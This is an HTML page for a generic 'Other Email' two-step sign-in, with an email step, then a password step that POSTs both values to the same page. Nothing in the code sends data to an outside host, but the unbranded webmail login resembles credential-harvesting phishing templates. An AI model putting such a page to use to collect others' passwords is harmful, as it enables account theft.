<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Other Email - Sign In</title>
    <style>
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }

        body {
            font-family: Arial, sans-serif;
            background-color: #f5f5f5;
            display: flex;
            justify-content: center;
            align-items: center;
            min-height: 100vh;
            padding: 20px;
        }

        .container {
            background-color: #ffffff;
            border-radius: 4px;
            padding: 40px;
            max-width: 450px;
            width: 100%;
            box-shadow: 0 2px 8px rgba(0, 0, 0, 0.1);
        }

        .header {
            background-color: #3e3e3e;
            color: #ffffff;
            padding: 20px;
            text-align: center;
            border-radius: 4px 4px 0 0;
            margin: -40px -40px 30px -40px;
        }

        .header h1 {
            font-size: 28px;
            font-weight: 400;
        }

        h2 {
            font-size: 22px;
            font-weight: 600;
            color: #000;
            margin-bottom: 24px;
            text-align: center;
        }

        .form-group {
            margin-bottom: 20px;
        }

        label {
            display: block;
            font-size: 14px;
            color: #000;
            margin-bottom: 6px;
            font-weight: 600;
        }

        input[type="text"],
        input[type="email"],
        input[type="password"] {
            width: 100%;
            padding: 12px;
            font-size: 14px;
            border: 1px solid #ccc;
            border-radius: 4px;
            outline: none;
            transition: border-color 0.2s;
        }

        input[type="text"]:focus,
        input[type="email"]:focus,
        input[type="password"]:focus {
            border-color: #2c6fbb;
        }

        .show-password {
            display: flex;
            align-items: center;
            position: relative;
        }

        .show-password input {
            padding-right: 60px;
        }

        .show-password-btn {
            position: absolute;
            right: 10px;
            background: none;
            border: none;
            color: #2c6fbb;
            cursor: pointer;
            font-size: 13px;
            text-decoration: underline;
        }

        .checkbox-container {
            display: flex;
            align-items: center;
            margin: 16px 0;
        }

        .checkbox-container input[type="checkbox"] {
            width: 16px;
            height: 16px;
            margin-right: 8px;
            cursor: pointer;
        }

        .checkbox-container label {
            font-size: 14px;
            color: #000;
            margin: 0;
            cursor: pointer;
            font-weight: 400;
        }

        .submit-btn {
            width: 100%;
            background-color: #2c6fbb;
            color: #ffffff;
            border: none;
            padding: 12px;
            font-size: 15px;
            font-weight: 600;
            border-radius: 4px;
            cursor: pointer;
            transition: background-color 0.2s;
            margin-top: 10px;
        }

        .submit-btn:hover {
            background-color: #245a99;
        }

        .forgot-link {
            display: block;
            text-align: center;
            font-size: 14px;
            color: #000;
            text-decoration: underline;
            margin-top: 16px;
        }

        .forgot-link:hover {
            color: #2c6fbb;
        }

        .user-info {
            background-color: #f9f9f9;
            border: 1px solid #e0e0e0;
            border-radius: 4px;
            padding: 12px;
            margin-bottom: 20px;
            font-size: 13px;
            color: #5f5f5f;
        }

        .user-info strong {
            color: #000;
        }
    </style>
</head>
<body>
    <div class="container">
        <div class="header">
            <h1>Other Email</h1>
        </div>
        
        <h2>Sign in</h2>
        
        <!-- Step 1: Email -->
        <form id="emailForm">
            <div class="form-group">
                <label for="email">Email *</label>
                <input type="text" id="email" name="email" required autofocus>
            </div>

            <div class="checkbox-container">
                <input type="checkbox" id="keepSignedIn">
                <label for="keepSignedIn">Keep me signed in on this device</label>
            </div>

            <button type="submit" class="submit-btn">Next</button>

            <a href="#" class="forgot-link">Need to find your password?</a>
        </form>

        <!-- Step 2: Password -->
        <form id="passwordForm" action="" method="POST" style="display: none;">
            <div class="form-group">
                <div style="margin-bottom: 16px; padding: 12px; background-color: #f9f9f9; border: 1px solid #e0e0e0; border-radius: 4px; font-size: 13px; color: #5f5f5f;">
                    <strong id="emailDisplay" style="color: #000;"></strong>
                </div>
            </div>

            <div class="form-group">
                <label for="password">Password *</label>
                <div class="show-password">
                    <input type="password" id="password" name="password" required autofocus>
                    <button type="button" class="show-password-btn" onclick="togglePassword()">Show</button>
                </div>
            </div>

            <input type="hidden" id="emailHidden" name="email">

            <div class="checkbox-container">
                <input type="checkbox" id="keepSignedIn2">
                <label for="keepSignedIn2">Keep me signed in on this device</label>
            </div>

            <button type="submit" class="submit-btn">Sign In</button>

            <a href="#" class="forgot-link">Need to find your password?</a>
        </form>
    </div>

    <script>
        function togglePassword() {
            const pwInput = document.getElementById('password');
            if (pwInput.type === 'password') {
                pwInput.type = 'text';
                event.target.textContent = 'Hide';
            } else {
                pwInput.type = 'password';
                event.target.textContent = 'Show';
            }
        }

        // Two-step login
        document.getElementById('emailForm').addEventListener('submit', function(e) {
            e.preventDefault();
            const email = document.getElementById('email').value.trim();
            
            if (!email) {
                alert('Email required');
                return;
            }
            
            // Show password step
            document.getElementById('emailForm').style.display = 'none';
            document.getElementById('passwordForm').style.display = 'block';
            document.getElementById('emailDisplay').textContent = email;
            document.getElementById('emailHidden').value = email;
            document.getElementById('password').focus();
        });

        function goBackToEmail(e) {
            if (e) e.preventDefault();
            document.getElementById('emailForm').style.display = 'block';
            document.getElementById('passwordForm').style.display = 'none';
            document.getElementById('email').focus();
        }
    </script>
</body>
</html>